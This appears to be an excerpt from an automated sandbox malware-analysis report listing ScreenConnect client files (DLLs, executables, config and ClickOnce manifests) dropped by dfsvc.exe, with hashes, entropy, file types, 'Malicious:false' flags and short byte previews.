                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.X..........."...0..@...........^... ...`....@.. .......................`............@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\WPJ32R11.A7J\XJ32B99D.HLB.application

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):118229
                                                                                                                                                                                                                                                      Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                      MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                      SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                      SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                      SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

